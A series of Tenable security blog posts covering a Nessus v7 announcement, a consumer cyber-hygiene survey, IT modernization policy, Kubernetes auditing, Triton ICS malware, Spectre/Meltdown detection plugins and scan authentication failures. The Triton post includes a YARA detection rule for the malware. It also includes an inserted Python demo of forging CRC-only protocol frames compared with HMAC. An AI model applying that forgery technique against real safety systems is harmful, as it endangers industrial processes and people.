We migrated all Tenable support customers and existing community members to the new platform on Monday, December 4th. As part of the rollout we created a new Nessus Professional group in the community yesterday, and inadvertently turned on notifications for every post. This triggered a cascade of emails for a subset of Nessus Professional customers for approximately two hours yesterday. We apologize to all customers who were affected by this error. Upon learning of this issue yesterday, our team immediately identified and quickly resolved it. We are currently implementing system changes to ensure no new notifications will be sent to group members unless you update your own notification preferences. Also, customers will only be added to Collaboration Groups upon their consent. As an extra precaution, we have temporarily disabled the community site as we update the settings. Once the community site is back online we’ll provide instructions on how to update your preferences. In the meantime, if you are in a group and would like to be removed, please email community@tenable.com directly and we will remove you. We understand this was annoying and we apologize. This mistake is below the standard we set for ourselves to provide you, our valued customers, with a great experience. We understand the trust that you place in Tenable and we take that responsibility extremely seriously. You have our commitment that nothing like this will happen again. In spite of this unfortunate error, I’m very excited by the new community site -- I look back in time to our original support “channel” for Nessus (venerable mailing lists) and see the contrast and potential to enable each one of you to better share your feedback, knowledge and tips regarding our products, and I simply can’t wait for our team and myself to interact with you this way. Separately, I also wanted to clarify some of the recent updates to Nessus Professional v7 specific to the API functionality. 
Nessus has become the gold standard for security practitioners who want fast, comprehensive and accurate point-in-time scans. Starting with version 7, we’ve decided to focus exclusively on this use case and dedicate our development to it. I originally designed Nessus to be used by an individual practitioner or consultant from within the interface. It was never intended for use in a purely automated fashion, using the API to run scans remotely and extract the data into another system. In fact, the first version of Nessus didn’t even have any form of command line support. As a result, we never built any safeguards in the API preventing a script from misusing it and overloading the scanner. Ultimately we decided to let go of this API after having seen some misuse of this functionality which stretched the capabilities of the scanner. For users who need to initiate and manage scans remotely, we have built a much better user experience in Tenable.io, which offers a robust, supported and better documented API, along with richer reporting options and the ability to manage and federate multiple scanners. Another point I’d like to cover is the removal of multi-user support in Nessus Professional v7. In the past, you could create multiple, independent users in Nessus Professional v6 and prior versions. We evaluated this feature and realized it adds confusion and falls short of expectations since users can’t share results, so we decided to remove it as well. These changes were done in the spirit of clarifying our product portfolio so we can focus our development efforts on the features that matter – and what practitioners actually use. Less than 2% of users use the remote scan API, and there are only a handful of scanners out there with multiple users. We believe using our engineering resources to make the scanner more efficient, flexible and scalable rather than focus on corner use cases is the right strategy to providing you with the best experience. 
For users who need fast, accurate, point-in-time vulnerability assessment, we want to empower you to get your job done and give you the power and flexibility you need. I'm excited to say that that's precisely what we're delivering with Nessus Professional v7. In addition to ongoing improvements in performance and vulnerability coverage, we also made the Nessus Professional license easily transferable (eliminating the 10-day waiting period), removed the "computer tie-in" so you can now install Nessus on a bootable USB stick or cloud instance, enabled you to include your own tailored branding in reports and added automated report delivery upon scan completion. You can find more information about Nessus Professional v7 here. If you have any questions or concerns, do not hesitate to contact us at support@tenable.com. I'd like to thank each of you for being loyal Nessus users. We are committed to continuing our heritage of innovation with continual development and improvements to our entire product portfolio. We look forward to delivering advancements that make you more successful, efficient and secure.

Thank You,
Renaud Deraison
Co-founder and CTO

NEW STUDY: MANY CONSUMERS LACK UNDERSTANDING OF BASIC CYBER HYGIENE
December 18, 2017, 5:00 am

Data breaches have been a headache for many years, and for a long time there seemed to be a general apathy about them. Our sense was that things may have changed in the wake of one of the most severe breaches ever – the theft of about 145 million Social Security numbers and other sensitive data from Equifax – which leaves most Americans with the burden of monitoring for identity theft for the rest of their lives.
Against this backdrop, we decided to find out how aware Americans are of cybersecurity threats and risks, how concerned they are about having their information stolen, and what they might be doing, or more importantly not doing, about it. We also wanted to learn whether recent breaches have caused Americans to change their behavior at all. Tenable recently commissioned a survey, conducted online by Harris Poll among more than 2,000 U.S. adults, to determine how data breaches – and the media attention around them – are affecting consumers' perceptions of their online security and their behavior. Going into this project, our hypothesis was that, because of all the recent breaches, Americans are more aware of security breaches than they were in the past, but that they likely continue to use poor security practices. The results are worse than we anticipated. According to the survey, more than 9 in 10 Americans (94%) have heard news stories about security breaches in the past 12 months, but among them more than 2 in 5 (43%) have not changed their online habits as a result. This suggests many Americans may not understand that they have a role to play in taking specific actions to safeguard their personal data.

CYBER ILLITERACY IS RAMPANT
While many Americans are aware of breaches in the news, about 1 in 5 (21%) aren't sure whether they have been affected by a security breach in the past 12 months. Only 12 percent of Americans say their personal information has been stolen by hackers due to a security breach in the past 12 months. But the Equifax breach alone exposed sensitive data on roughly 145 million Americans, so the true figure must be far higher than 12 percent. Given the Yahoo! breach and countless others, this suggests an alarming lack of understanding about the pervasiveness of recent breaches and the risks they pose to average Americans. It's cyber illiteracy.
While most Americans (94%) have heard news stories about security breaches in the last year, and a majority say they are worried about risks associated with activities as basic as using public Wi-Fi hotspots and shopping online, many still have not taken some critical steps to protect their data. For example, only 25 percent of Americans have enabled two-factor authentication on their devices to protect their personal information in the past 12 months, even though security experts and major online services and technology companies such as Facebook and Google strongly encourage it. More than 2 in 3 Americans (68%) say they have avoided opening links or attachments from unsolicited emails or texts in the past 12 months; that has been basic security advice since the early 2000s, and the remaining third should adopt it too. In addition, only about 3 in 10 Americans who have heard news stories about security breaches in the past 12 months (32%) have reduced their use of public Wi-Fi or unknown hotspots as a result, which suggests many still do this frequently, and it remains a significant risk. Many Americans do not seem very confident about the security of their data: nearly 2 in 5 (37%) think it likely that their personal information will be stolen in a security breach in the next six months. Many are also worried about their personal information being stolen through the most common online activities. While 63 percent are worried about their data being stolen when connecting to public or unknown Wi-Fi hotspots, nearly 3 in 5 (58%) are worried when shopping online, half (50%) when banking online, and 35 percent when connecting with friends and family through social media.
ROUGHLY ONE IN TWO AMERICANS LACKS BASIC CYBER HYGIENE
The survey shows that nearly all consumers are aware of security breaches, but many do not take basic precautions to protect their data. In the past 12 months, only 56 percent of Americans have used a password to lock their computer and only 45 percent use a PIN to lock their mobile devices. Roughly half of Americans (53%) say they have made their account passwords more complicated in the past 12 months, and 15 percent have used a password manager. Another emerging authentication technology – biometrics – is still not widespread, with only 19 percent of Americans reporting that they have enabled it on their devices in the past 12 months. This is surprising given that Apple has offered the user's fingerprint as a security measure since 2013. Even when help is offered at no cost, Americans may not be taking advantage of some of the easiest ways to stay on top of their personal cybersecurity. Credit monitoring, which Equifax and other breached companies offer free for a year, is one of the many ways to watch for identity fraud, so we were surprised to find that so few Americans have signed up for such a service: only about one-quarter (26%) have used a credit monitoring service to protect their personal information in the past 12 months, and only 12 percent have used an identity monitoring service. Another basic tactic is to update, update, update – and fast. Apps downloaded onto devices are a popular inroad for hackers to compromise devices and steal data when the apps have security vulnerabilities, which is fairly common. Attackers who uncover a weakness can exploit it only as long as it remains unpatched, so minimizing that window of opportunity is key to staying safe.
While some Americans seem to be trying to stay on top of their software updates, many still aren't updating their apps in a timely manner when updates become available. Fourteen percent of smartphone users wait more than a week to update apps on their smartphone after receiving a prompt, or never do it. Meanwhile, 13 percent of computer users wait more than a week to update the apps on their computer, including 3 percent who wait longer than a month after receiving a prompt and 5 percent who don't update apps on their computer at all.

CONSUMER SECURITY CHECKLIST
1. Where available, enable two-factor authentication for all online services.
2. Update your apps and computers within 24 hours of receiving a notification.
3. Assign strong passwords to your computer, mobile phone and tablet – and don't share them with others.

WHAT DOES THIS MEAN FOR ENTERPRISES?
Organizations are scrambling to shore up their defenses in light of all the breaches, as they should be. But they also need to lead the way in the basic security practices that keep customer and critical business data safe. There is a need for a "top down" approach in which organizations provide comprehensive cybersecurity but also team up with customers and employees to educate them about what they can do to extend good practices across their own personal attack surface. This starts with companies being more transparent about their own security practices and holding themselves accountable for lapses. If they don't make security a top business priority and aren't sensitive to these changing consumer patterns and needs, they risk losing customers. Today, being customer-focused isn't just about making good products; it's about listening to customers and making sure the products and services they use don't cause them harm. Cyber risk poses a threat to our economy and our social fabric, so safeguarding ourselves is a shared responsibility.
Enterprises must lead the way by practicing fundamental hygiene and enforcing a basic standard of care for their customers' data. But individuals must do their part, too – both as consumers and, in many cases, as employees of those same enterprises – and that starts with cyber literacy.

Survey methodology: This survey was conducted online within the United States by Harris Poll on behalf of Tenable from November 28-30, 2017 among 2,196 U.S. adults ages 18 and older. This online survey is not based on a probability sample and therefore no estimate of theoretical sampling error can be calculated. For complete survey methodology, including weighting variables and subgroup sample sizes, please contact Sarah Spitz of Bateman Group at 347-382-9731.

CONGRESS ACHIEVES REAL IT MODERNIZATION PROGRESS
December 19, 2017, 5:00 am

We've talked for a while about the need for Congress to prioritize upgrading and modernizing government IT systems, so we were glad to see the Senate recently pass the 2017 National Defense Authorization Act (NDAA) with the Modernizing Government Technology (MGT) Act intact. The MGT Act (HR 2227), introduced by Rep. Will Hurd (R-TX), was signed into law last Tuesday. Federal IT modernization is a critical component of strong government cybersecurity, and the necessity for this bill is clearer than ever. Recently, the House Oversight and Government Reform Subcommittee on Information Technology, which Rep. Hurd chairs, gave several federal agencies failing grades for their IT modernization efforts in the latest Federal IT Acquisition Reform Act (FITARA) scorecard. Encouragingly, Chairman Hurd plans to include the MGT Act's requirement for agencies to establish working capital funds as a category in a future scorecard. Rep.
Hurd's goal of evolving FITARA into a digital Cyber Exposure scorecard would help agencies assess their risk more clearly because, as he noted recently, legacy technology poses both a financial and a cybersecurity risk to our nation. Chief among those risks is the inability even to identify legacy technology within a rapidly expanding inventory of assets. Agencies need a modern approach to cybersecurity that includes live discovery of every asset, whether it's an old server or an iPad, and continuous visibility into where those assets are secure or exposed. All organizations now face an elastic attack surface, where the constantly changing set of assets and their vulnerabilities has opened a gap in their ability to understand overall cyber risk. The MGT Act will help close that gap by establishing a capital fund so agencies can purchase the modern tools necessary for a comprehensive view of their Cyber Exposure. The cyber funding in the bill also ensures that security is part of future modernization efforts. Further, the MGT Act could save billions in taxpayer dollars, given that more than $64 billion is currently spent annually just to operate and maintain legacy IT systems. The MGT Act is smart public policy, and it's encouraging to see bipartisan progress from the IT subcommittee on such a critical cybersecurity issue, including Chairman Hurd, ranking member Kelly (D-IL), and Reps. Connolly (D-VA) and Gianforte (R-MT). Yet there is more to be done. Rep. Hurd's next stated focus, developing a "cyber corps," will help ensure that the federal government has access to the people and skills it needs to prevent and respond to cyberthreats. We also need to explore how advanced technologies such as quantum computing and blockchain might be used to mitigate threats. We look forward to supporting these and other efforts to modernize the federal government's approach to cybersecurity next year.
AUDITING KUBERNETES FOR SECURE CONFIGURATIONS
December 28, 2017, 5:00 am

Over the last few years, container technology has gained traction in enterprise environments, and use of containerized applications has exploded. Naturally, as adoption increased, management platforms such as Kubernetes were developed to manage containerized applications, and they have become critical to any modern DevOps-focused infrastructure. Tenable recently released an audit to help customers secure this key piece of infrastructure in their environments.

WHAT'S KUBERNETES?
Kubernetes is an open-source orchestration platform for deploying, maintaining and scaling containerized applications. It was originally developed by Google and later donated to the Cloud Native Computing Foundation. By leveraging Kubernetes, organizations can:
* Deploy applications in a predictable manner
* Scale workloads up and down
* Limit resource utilization
* Increase availability through self-healing capabilities

WHY USE KUBERNETES?
Organizations choose Kubernetes over other orchestration platforms for many reasons:
* Kubernetes is open source and part of the Cloud Native Computing Foundation, which has an impressive list of member organizations
* Vendor lock-in is reduced, as deployments can run on bare metal, virtual machines and public or private cloud, or a combination thereof
* Kubernetes can be used for deployments of any size, from a single cluster to a scaled-up, federated platform orchestrating multiple geographically dispersed clusters
* Vanilla Kubernetes can easily be extended with enterprise-grade options such as Tectonic, Rancher and OpenShift

WHY AUDIT KUBERNETES CONFIGURATION?
Depending on the workloads you run on Kubernetes, you may consider it a core piece of network infrastructure. After all, it could be hosting the external applications that generate revenue for your business, sensitive internal applications, customer information and more. Auditing the security configuration of such platforms should therefore be an important part of any organization's security program. A secure configuration audit provides a level of assurance that an information system is configured according to industry-standard best practice recommendations. The defender has to account for every flaw that may exist, while an attacker may only need to find a single one. As an example, a recommended configuration is to allow only HTTPS traffic to the API server. If that traffic were not encrypted, an attacker on the network path could obtain sensitive information such as secrets and keys, and potentially take control of the cluster. The good news is that Tenable customers can now perform a configuration audit of their Kubernetes deployment based on the Center for Internet Security (CIS) benchmark.

CIS KUBERNETES BENCHMARK
CIS recently released the CIS Kubernetes Benchmark, which provides detailed guidance on securely configuring the core components of Kubernetes: master nodes, worker nodes and federated deployments.

MASTER NODE(S)
Responsible for managing the workload within the cluster. Services include:
* etcd: A key-value data store for cluster configuration
* API server: A REST service that provides the interface into Kubernetes; state is stored in etcd
* Scheduler: Determines which nodes workloads should be assigned to
* Controller manager: The process in which controllers such as the DaemonSet and Replication controllers run; controllers access the API to manage resources

WORKER NODES
Responsible for running workloads within the cluster.
Services include:
* Kubelet: Responsible for monitoring the health of containers
* Kube-proxy: Acts as proxy and load balancer for the containers running on the node
* Container runtime: The service that runs the containers, such as Docker

FEDERATED DEPLOYMENTS
Function similarly to master nodes, except that they manage clusters instead of worker nodes. Services include:
* Federation API server
* Federation Controller Manager
Federation is not required in all deployments, so this section may not apply to your organization.

HOW TO GET STARTED
To get started, log into Tenable.io and create a new Policy Compliance Auditing scan. In your scan configuration, select the Compliance tab. Under UNIX, the CIS Kubernetes Benchmarks are now available. Because Kubernetes deployments vary, the audit uses variables so that the checks match your deployment. (Screenshot: the Compliance tab with the CIS Kubernetes audit and its variables.) Once the configuration is saved, run the scan and review the results. (Screenshot: sample scan output; for simplicity, only results from the worker node are shown.) A closer view of a single result shows:
* Pass/fail status
* Remediation steps, if necessary
* Individual results from the systems scanned
(Screenshot: detail of one result.) Also note the references to cybersecurity frameworks and standards on the right, in the Reference Information section.
In this example, the controls listed are:
* ITSG-33: CM-6 – configuration settings
* CIS CSCv6 9.1 – ensure that only ports, protocols and services with validated business needs are running on each system
* NIST 800-53: CM-6 – configuration settings
* NIST CSF: PR.IP-1 – a baseline configuration of information technology/industrial control systems is created and maintained
* NIST 800-171: 3.4.2 – establish and enforce security configuration settings for IT products employed in organizational information systems
Depending on the cybersecurity framework your organization follows, you can map these compliance results to its controls to help demonstrate compliance.

WRAP-UP: PLANNING A KUBERNETES DEPLOYMENT
When planning a Kubernetes deployment, it's important to:
* Create or adopt a secure configuration
* Determine how you'll monitor the configuration
* Establish how frequently you'll review the configuration
At Tenable, we regularly update our policy compliance audits to match the newest versions published by the Center for Internet Security (CIS) and the Defense Information Systems Agency (DISA). In some cases, we produce our own best practice audits. We also realize there are many cybersecurity frameworks available for organizations to follow, so we regularly map the checks in the policy compliance audits to various framework controls. Learn more about Tenable.io.

TRITON: WHAT YOU NEED TO KNOW
January 2, 2018, 1:31 pm

Correction: An earlier version of this post identified the protocol used as the TSAA protocol. This malware uses the TriStation protocol, which is proprietary and undocumented. Thanks to Jimmy Wylie for the correction.

WHAT IS TRITON?
Triton is a new malware framework targeting the safety systems that monitor SCADA networks.
It is designed to run from within a compromised network, allowing the attacker to observe and control Triconex Safety Instrumented System (SIS) devices. It has been reported that the attackers copied a malicious file (trilog.exe) onto a management workstation, a Windows PC, and used that vantage point to attempt to write new firmware to the memory of SIS devices. The device firmware is designed to be updated remotely. A physical key on the front of the device switches between PROGRAM mode, where modifications are allowed, and other modes such as the read-only RUN mode. The attackers used this capability as designed and relied on users having left the device in PROGRAM mode. Although Triton, as reported, did not exploit any vulnerability, Nessus can identify the early stages of the attack.

WHICH DEVICES WERE ATTACKED BY TRITON?
Triton attacked Triconex Main Processors, model 3008. These safety monitoring systems were approved for use by the United States Nuclear Regulatory Commission in 2012.

WHAT'S THE IMPACT?
If successful, this attack could have run arbitrary code on critical safety monitoring systems, concealing or causing physical damage to the monitored processes.

DID THE ATTACKERS NEED TO REVERSE ENGINEER THE DEVICES?
Not necessarily. The US Nuclear Regulatory Commission maintains copies of the programming guides and communications manuals in use at the time of its approval. Appendix D documents the TriStation protocol, including the WRITE_TRICON_DATA command this malware likely used. The protocol is simple and has no authentication; the only integrity mechanism it supplies is a per-message CRC, which protects against transmission errors, not against an attacker who can simply recompute it.

TENABLE COVERAGE OF TRITON

MALWARE DETECTION PLUGIN
Tenable can detect whether the management station contains Triton through its malware detection plugin.
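The protocol point above, no authentication and only a per-message CRC, deserves a concrete illustration. What follows is an added example, not code from the post and not a Triconex, TriStation or Tenable implementation: it computes CRC-16/CCITT with the 0x1D0F initial value that the `CRC16_CCITT_x1D0F` string in the YARA rule later in this post names, shows that a single flipped bit is caught, and then shows that an attacker who rewrites the payload and recomputes the CRC passes exactly the same receiver check, whereas a keyed MAC (HMAC-SHA256) rejects the forgery. The frame contents and the MAC key are constructed for the example; the post does not establish the protocol's actual wire format or CRC parameters, and the conclusion holds for any CRC.

```python
import hashlib
import hmac

POLY = 0x1021  # CRC-16/CCITT generator polynomial, processed MSB-first


def crc16_ccitt(data: bytes, init: int = 0x1D0F) -> int:
    """Bitwise CRC-16/CCITT, no input/output reflection, no final XOR.
    init=0x1D0F is the CRC-16/AUG-CCITT variant named in the YARA rule;
    init=0x0000 gives XMODEM and init=0xFFFF gives CCITT-FALSE."""
    crc = init
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ POLY) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc


def seal_crc(payload: bytes) -> bytes:
    """Append a big-endian CRC-16 trailer, as a CRC-only protocol would."""
    return payload + crc16_ccitt(payload).to_bytes(2, "big")


def check_crc(frame: bytes) -> bool:
    """Receiver side: recompute the CRC over the body, compare with the trailer."""
    if len(frame) < 2:
        return False
    body, trailer = frame[:-2], int.from_bytes(frame[-2:], "big")
    return crc16_ccitt(body) == trailer


def forge_crc(new_payload: bytes) -> bytes:
    """Attacker side: no secret is involved, so forging is just re-sealing."""
    return seal_crc(new_payload)


# Hardened alternative: a keyed MAC. The key is constructed for this example only.
KEY = b"constructed-example-key-do-not-reuse"


def seal_mac(payload: bytes, key: bytes = KEY) -> bytes:
    return payload + hmac.new(key, payload, hashlib.sha256).digest()


def check_mac(frame: bytes, key: bytes = KEY) -> bool:
    if len(frame) < 32:
        return False
    body, tag = frame[:-32], frame[-32:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)


def demo() -> dict:
    # Constructed, illustrative "write" messages; not real TriStation frames.
    legit = b"WRITE_PROGRAM seq=7 data=00000000"
    forged = b"WRITE_PROGRAM seq=7 data=DEADBEEF"

    crc_frame = seal_crc(legit)
    corrupted = bytearray(crc_frame)
    corrupted[6] ^= 0x01  # one-bit transmission error inside the body

    mac_frame = seal_mac(legit)
    mac_forged = forged + mac_frame[-32:]  # attacker keeps the old tag, has no key

    return {
        "crc_legit": check_crc(crc_frame),            # True
        "crc_bit_error": check_crc(bytes(corrupted)), # False: a CRC catches noise
        "crc_forged": check_crc(forge_crc(forged)),   # True: it does not catch an attacker
        "mac_legit": check_mac(mac_frame),            # True
        "mac_forged": check_mac(mac_forged),          # False: no key, no valid tag
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:14s} accepted={accepted}")
```

The three standard check values for "123456789" (0xE5CC, 0x31C3 and 0x29B1 for the three initial values) confirm the CRC routine; the interesting rows are `crc_forged` and `mac_forged`, which is the whole difference between an integrity check and authentication.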
Here's an example of a Triton hash detected with the Malicious Process Detection plugin (ID 59275). (Screenshot not reproduced.)

YARA DETECTION
Tenable customers can also use YARA rules to identify affected systems through the Malicious File Detection Using Yara Nessus plugin. Here's a sample rule that can be used with Nessus to detect Triton:

```yara
rule TRITON_ICS_FRAMEWORK
{
    meta:
        author = "nicholas.carr @itsreallynick"
        md5 = "0face841f7b2953e7c29c064d6886523"
        description = "TRITON framework recovered during Mandiant ICS incident response"

    strings:
        $python_compiled = ".pyc" nocase ascii wide
        $python_module_01 = "__module__" nocase ascii wide
        $python_module_02 = "<module>" nocase ascii wide
        $python_script_01 = "import Ts" nocase ascii wide
        $python_script_02 = "def ts_" nocase ascii wide

        $py_cnames_01 = "TS_cnames.py" nocase ascii wide
        $py_cnames_02 = "TRICON" nocase ascii wide
        $py_cnames_03 = "TriStation " nocase ascii wide
        $py_cnames_04 = " chassis " nocase ascii wide

        $py_tslibs_01 = "GetCpStatus" nocase ascii wide
        $py_tslibs_02 = "ts_" ascii wide
        $py_tslibs_03 = " sequence" nocase ascii wide
        $py_tslibs_04 = /import Ts(Hi|Low|Base)[^:alpha:]/ nocase ascii wide
        $py_tslibs_05 = /module\s?version/ nocase ascii wide
        $py_tslibs_06 = "bad " nocase ascii wide
        $py_tslibs_07 = "prog_cnt" nocase ascii wide

        $py_tsbase_01 = "TsBase.py" nocase ascii wide
        $py_tsbase_02 = ".TsBase(" nocase ascii wide

        $py_tshi_01 = "TsHi.py" nocase ascii wide
        $py_tshi_02 = "keystate" nocase ascii wide
        $py_tshi_03 = "GetProjectInfo" nocase ascii wide
        $py_tshi_04 = "GetProgramTable" nocase ascii wide
        $py_tshi_05 = "SafeAppendProgramMod" nocase ascii wide
        $py_tshi_06 = ".TsHi(" ascii nocase wide

        $py_tslow_01 = "TsLow.py" nocase ascii wide
        $py_tslow_02 = "print_last_error" ascii nocase wide
        $py_tslow_03 = ".TsLow(" ascii nocase wide
        $py_tslow_04 = "tcm_" ascii wide
        $py_tslow_05 = " TCM found" nocase ascii wide

        $py_crc_01 = "crc.pyc" nocase ascii wide
        $py_crc_02 = "CRC16_MODBUS" ascii wide
        $py_crc_03 = "Kotov Alaxander" nocase ascii wide
        $py_crc_04 = "CRC_CCITT_XMODEM" ascii wide
        $py_crc_05 = "crc16ret" ascii wide
        $py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide
        $py_crc_07 = /CRC16_CCITT[^_]/ ascii wide

        $py_sh_01 = "sh.pyc" nocase ascii wide

        $py_keyword_01 = " FAILURE" ascii wide
        $py_keyword_02 = "symbol table" nocase ascii wide

        $py_TRIDENT_01 = "inject.bin" ascii nocase wide
        $py_TRIDENT_02 = "imain.bin" ascii nocase wide

    condition:
        2 of ($python_*) and 7 of ($py_*) and filesize < 3MB
}
```

WHAT CAN YOU DO TO PROTECT YOUR ORGANIZATION FROM TRITON?
Ensure that no Tricon processors are left in PROGRAM mode. The physical key on each device can prevent this malware from succeeding: after initial programming of the device is complete, switch the key to RUN or REMOTE. Monitor management stations for malware; they are highly valuable pivot points into the Distributed Control System (DCS) network. Tricon devices can be configured with an IP or subnet whitelist; configure this access control to allow communication only from management stations and the DCS and SIS networks. Such restrictions also limit what active security controls, including active scanning, can do inside these networks, which is why a passive monitoring solution such as Nessus Network Monitor is essential.

STAY TUNED FOR MORE UPDATES
Tenable is keeping a close eye on this story as it develops. Our team will release coverage as information becomes available, and this post will be updated if new plugins are released.

THE FIRST MAJOR SECURITY LOGOS OF 2018: SPECTRE AND MELTDOWN VULNERABILITIES
January 4, 2018, 11:54 am

A flaw in the way modern CPUs speculatively execute instructions, observable through the CPU cache, could allow one program to read data belonging to another. The vulnerabilities affect most systems in use today, if not all. They have been named Spectre and Meltdown and have a dedicated website.
According to the security advisory, Spectre breaks the isolation between different applications and allows an attacker to expose data once thought to be secure. Meltdown breaks the most fundamental isolation between user applications and the operating system. Both attacks are independent of the operating system and do not rely on any software vulnerabilities. To reduce the risk of compromise, users must apply software patches as quickly as possible.

SIDE CHANNEL ATTACKS

The new bugs are classed as side channel attacks because the contents of the accessed memory location are obtained through a side channel rather than read directly. Spectre allows an application to force another application to access arbitrary portions of its own memory, which can then be read through the side channel. This is made possible by speculative execution, a technique used by high-speed processors to increase performance by guessing likely future execution paths and preemptively executing the instructions in them. Spectre takes advantage of this execution and affects all modern processors capable of keeping instructions in flight.

Memory isolation is a cornerstone of security and of the environment that allows multiple processes to run on one device. The Meltdown bug overcomes that memory isolation and allows any application to access all system memory, including memory allocated to the kernel. Here the side channel is a side effect of out-of-order execution, which processors use as a performance enhancement. Meltdown specifically affects every Intel processor on all desktop, laptop and cloud computers except Intel Itanium and Intel Atom before 2013.

IDENTIFYING AFFECTED SYSTEMS

Operating system vendors are forgoing their regular patch release cycles and publishing operating system patches to address this issue. Tenable.io, SecurityCenter and Nessus can identify affected systems by looking for the newly released patches.
Each plugin created for the Spectre and Meltdown vulnerabilities will be marked with at least one of the following CVEs:

* CVE-2017-5753: Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.
* CVE-2017-5715: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.
* CVE-2017-5754: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.

To identify which systems are affected using Tenable.io, open the workbench and, using the advanced search, apply a CVE filter (CVE-2017-5753,CVE-2017-5715,CVE-2017-5754) as shown below. In the example filter, each CVE is placed in the field separated by a comma. (screenshot)

PLUGINS

Searching for plugins by CVE returns several plugins. This list will be updated as more plugins are released.
Vendor            Plugin ID  Description
Amazon            105517     Amazon Linux AMI : kernel (ALAS-2018-939)
Microsoft         105547     KB4056888: Windows 10 Version 1511 January 2018 Security Update (Meltdown)(Spectre)
Microsoft         105548     KB4056890: Windows 10 Version 1607 and Windows Server 2016 January 2018 Security Update (Meltdown)(Spectre)
Microsoft         105549     KB4056891: Windows 10 Version 1703 January 2018 Security Update (Meltdown)(Spectre)
Microsoft         105550     KB4056892: Windows 10 Version 1709 January 2018 Security Update (Meltdown)(Spectre)
Microsoft         105551     KB4056893: Windows 10 LTSB January 2018 Security Update (Meltdown)(Spectre)
Microsoft         105552     KB4056897: Windows 7 and Windows Server 2008 R2 January 2018 Security Update (Meltdown)(Spectre)
Microsoft         105553     KB4056898: Windows 8.1 and Windows Server 2012 R2 January 2018 Security Update (Meltdown)(Spectre)
Red Hat           105523     RHEL 7 : kernel (RHSA-2018:0007)
Red Hat           105524     RHEL 6 : kernel (RHSA-2018:0008)
Red Hat           105525     RHEL 7 : kernel (RHSA-2018:0009)
Red Hat           105526     RHEL 7 : kernel (RHSA-2018:0010)
Red Hat           105527     RHEL 6 : kernel (RHSA-2018:0011)
Red Hat           105528     RHEL 7 : microcode_ctl (RHSA-2018:0012)
Red Hat           105529     RHEL 6 : microcode_ctl (RHSA-2018:0013)
Red Hat           105530     RHEL 7 : linux-firmware (RHSA-2018:0014)
Red Hat           105531     RHEL 7 : linux-firmware (RHSA-2018:0015)
Red Hat           105532     RHEL 7 : kernel-rt (RHSA-2018:0016)
Red Hat           105533     RHEL 6 : kernel (RHSA-2018:0017)
Scientific Linux  105534     Scientific Linux Security Update : kernel on SL6.x i386/x86_64
Scientific Linux  105535     Scientific Linux Security Update : kernel on SL7.x x86_64
Scientific Linux  105536     Scientific Linux Security Update : microcode_ctl on SL6.x i386/x86_64
Scientific Linux  105537     Scientific Linux Security Update : microcode_ctl on SL7.x x86_64
SUSE              105539     SUSE SLED12 / SLES12 Security Update : ucode-intel (SUSE-SU-2018:0006-1)
SUSE              105540     SUSE SLED12 / SLES12 Security Update : qemu (SUSE-SU-2018:0007-1)
SUSE              105541     SUSE SLES11 Security Update : microcode_ctl (SUSE-SU-2018:0009-1)
VMware            105485     VMware Fusion 8.x < 8.5.9 Multiple Vulnerabilities (VMSA-2017-0021) (VMSA-2018-0002) (Spectre) (macOS)
VMware            105555     VMware Player 12.x < 12.5.8 Multiple Vulnerabilities (VMSA-2017-0021) (VMSA-2018-0002) (Spectre)
VMware            105487     VMware Workstation 12.x < 12.5.8 Multiple Vulnerabilities (VMSA-2017-0021) (VMSA-2018-0002) (Spectre)
VMware            105486     ESXi 5.5 / 6.0 / 6.5 / Multiple Vulnerabilities (VMSA-2017-0021) (VMSA-2018-0002) (Spectre) (remote check)

WRAPPING UP

We will continue to research these vulnerabilities and investigate different ways to detect them. When new information is available, we will release additional plugins. This vulnerability is a real and present danger to all organizations and should be patched immediately. While Microsoft, Red Hat, VMware and other vendors are making efforts to release patches, organizations are responsible for applying those patches as soon as possible.

TRACKING SCAN AUTHENTICATION FAILURES
January 11, 2018, 5:00 am

IT systems change all the time. New applications are added, configurations are changed, permissions get revised – the list goes on and on. In some cases, the changes end up restricting access to the system: user accounts are removed, access is revoked, account credentials change or expire, leading to unexpected authentication failures and lockouts. And when the credentials fail, applications that depend on them fail, too. When the application that ends up failing is a vulnerability scanner (such as Nessus), the impact on an organization can be significant.
Most organizations run vulnerability scans on a weekly or monthly schedule, so a scan missed because of an authentication failure can mean missed vulnerabilities, leaving systems within the organization exposed for weeks, if not months, before the failure is identified and rectified. To help our customers identify such failures earlier and resolve them sooner, we recently released a new plugin that consolidates authentication failures across the supported protocols and reports them in one place.

The plugin runs toward the end of a scan and collects results from the entire scan to provide a consolidated report. The plugin needs to be enabled in the scan policy for it to provide a report. Also note that the plugin will not report authentication failures for any host that Nessus is able to successfully authenticate to for a given protocol.

The plugin currently reports authentication failures for the following protocols/technologies:

SSH

The plugin reports detailed information on authentication failures on a per-credential basis. As an example, if the scan policy had three credentials defined and each of them failed for one reason or another, it will report each user credential that failed and the reason it failed. Here’s an SSH example: (screenshot)

SMB

The plugin reports authentication failures on a per-credential basis for SMB as well. Here’s an example: (screenshot)

DATABASE AUTHENTICATION

If database credentials are provided as part of the scan, and the credentials fail for one or more database technologies (e.g., MySQL, Oracle), this plugin will report those failures as well. Here’s an example of database credential failure output: (screenshot)

IBM ISERIES

If IBM iSeries credentials are provided as part of the scan and Nessus fails to authenticate, the plugin will report the authentication failure along with the reason it failed. Here’s an example: (screenshot)

WRAP-UP

For Nessus to perform an accurate and complete vulnerability scan, it needs credentials with appropriate privileges to do its job. We realize that providing the right set of credentials and privileges to perform the scan is a challenging problem, and we recently released additional functionality to help solve some of those problems. But a failed scan due to incorrect credentials shouldn’t be left unattended for long, since it could have a huge unintended impact. The last thing you want is to be lulled into a false sense of safety while your environment changes around you. Therefore, tracking such failures sooner should be a top priority for any organization. With the release of this new plugin, we hope our customers can do just that.

INTEL AMT BACK IN THE NEWS
January 12, 2018, 4:58 pm

